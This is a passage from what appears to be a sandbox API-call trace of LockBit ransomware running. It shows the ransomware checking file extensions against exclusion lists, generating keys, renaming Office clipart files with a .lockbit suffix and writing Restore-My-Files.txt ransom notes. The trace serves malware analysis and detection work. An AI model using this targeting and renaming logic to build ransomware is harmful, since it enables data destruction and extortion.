lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.749] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.750] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.750] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.750] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.750] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.750] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.750] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.750] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.750] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.750] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.750] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.750] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.750] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.750] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.750] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.750] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.750] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.750] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.750] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00334_.WMF") returned 1 [0117.750] lstrcmpiW (lpString1="ntldr", lpString2="HH00334_.WMF") returned 1 [0117.750] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00334_.WMF") returned 1 [0117.750] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00334_.WMF") returned -1 [0117.751] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00334_.WMF") returned -1 [0117.751] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00334_.WMF") returned 1 [0117.751] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00334_.WMF") returned 1 [0117.751] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.751] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned=".WMF" [0117.751] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.751] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.751] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.751] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.751] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.751] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.751] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.751] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.751] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.751] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.751] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.751] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.751] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.751] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.751] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.751] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.752] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.752] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.752] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.752] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.752] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.752] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.752] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.752] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.752] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.752] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.752] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.752] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.752] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF.lockbit") returned 72 [0117.752] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00334_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0117.753] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.753] malloc (_Size=0x40068) returned 0x3e70008 [0117.753] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=1528) returned 1 [0117.753] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.754] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0117.754] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.754] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0117.754] ReadFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0117.764] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.764] malloc (_Size=0xa6) returned 0x77d7a8 [0117.764] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.765] free (_Block=0x77d7a8) [0117.765] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.765] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.765] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.765] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38a5000, ftCreationTime.dwHighDateTime=0x1bd4b19, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe38a5000, ftLastWriteTime.dwHighDateTime=0x1bd4b19, nFileSizeHigh=0x0, nFileSizeLow=0xce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00443_.WMF", cAlternateFileName="")) returned 1 [0117.765] lstrcmpiW (lpString1=".", lpString2="HH00443_.WMF") returned -1 [0117.765] lstrcmpiW (lpString1="..", lpString2="HH00443_.WMF") returned -1 [0117.765] PathFindExtensionW (pszPath="HH00443_.WMF") returned=".WMF" [0117.765] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.766] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.767] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.767] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.767] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.767] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.767] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.767] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.767] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.767] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.767] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.767] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.767] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.767] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.767] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.767] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.767] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.767] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.767] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.767] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.767] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.768] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.768] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.768] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.768] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.768] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.768] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.768] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.768] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00443_.WMF") returned 1 [0117.768] lstrcmpiW (lpString1="ntldr", lpString2="HH00443_.WMF") returned 1 [0117.768] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00443_.WMF") returned 1 [0117.768] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00443_.WMF") returned -1 [0117.768] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00443_.WMF") returned -1 [0117.768] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00443_.WMF") returned 1 [0117.768] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00443_.WMF") returned 1 [0117.768] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.768] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned=".WMF" [0117.768] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.768] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.768] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.768] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.769] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.770] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.770] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.770] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.770] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.770] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.770] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF.lockbit") returned 72 [0117.770] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00443_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0117.775] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.775] malloc (_Size=0x40068) returned 0x3ef0008 [0117.775] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=3298) returned 1 [0117.775] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.776] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0117.776] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.776] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0117.776] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0117.781] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.781] malloc (_Size=0xa6) returned 0x77d7a8 [0117.781] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.782] free (_Block=0x77d7a8) [0117.782] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.782] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.782] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.782] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9cafd00, ftCreationTime.dwHighDateTime=0x1bd4b16, ftLastAccessTime.dwLowDateTime=0x5386f090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe9cafd00, ftLastWriteTime.dwHighDateTime=0x1bd4b16, nFileSizeHigh=0x0, nFileSizeLow=0x332, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00513_.WMF", cAlternateFileName="")) returned 1 [0117.782] lstrcmpiW (lpString1=".", lpString2="HH00513_.WMF") returned -1 [0117.783] lstrcmpiW (lpString1="..", lpString2="HH00513_.WMF") returned -1 [0117.783] PathFindExtensionW (pszPath="HH00513_.WMF") returned=".WMF" [0117.783] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.783] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.783] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.783] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.783] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.783] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.783] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.783] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.783] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.783] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.783] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.783] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.783] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.783] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.783] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.783] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.783] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.784] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.784] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.785] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.785] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.785] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.785] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.785] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.785] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.785] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.785] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.785] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.785] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.785] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00513_.WMF") returned 1 [0117.785] lstrcmpiW (lpString1="ntldr", lpString2="HH00513_.WMF") returned 1 [0117.785] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00513_.WMF") returned 1 [0117.785] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00513_.WMF") returned -1 [0117.785] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00513_.WMF") returned -1 [0117.785] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00513_.WMF") returned 1 [0117.785] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00513_.WMF") returned 1 [0117.785] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.785] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF") returned=".WMF" [0117.785] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.786] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.786] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.786] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.786] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.786] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.786] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.786] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.786] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.786] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.786] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.786] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.786] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.786] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.786] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.786] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.786] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.786] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.786] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.786] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.787] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.787] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.787] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.787] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.787] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.787] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.787] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.787] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.787] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF.lockbit") returned 72 [0117.787] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00513_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0117.788] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.788] malloc (_Size=0x40068) returned 0x3d70450 [0117.788] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=818) returned 1 [0117.788] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.789] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0117.789] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.789] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0117.789] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, 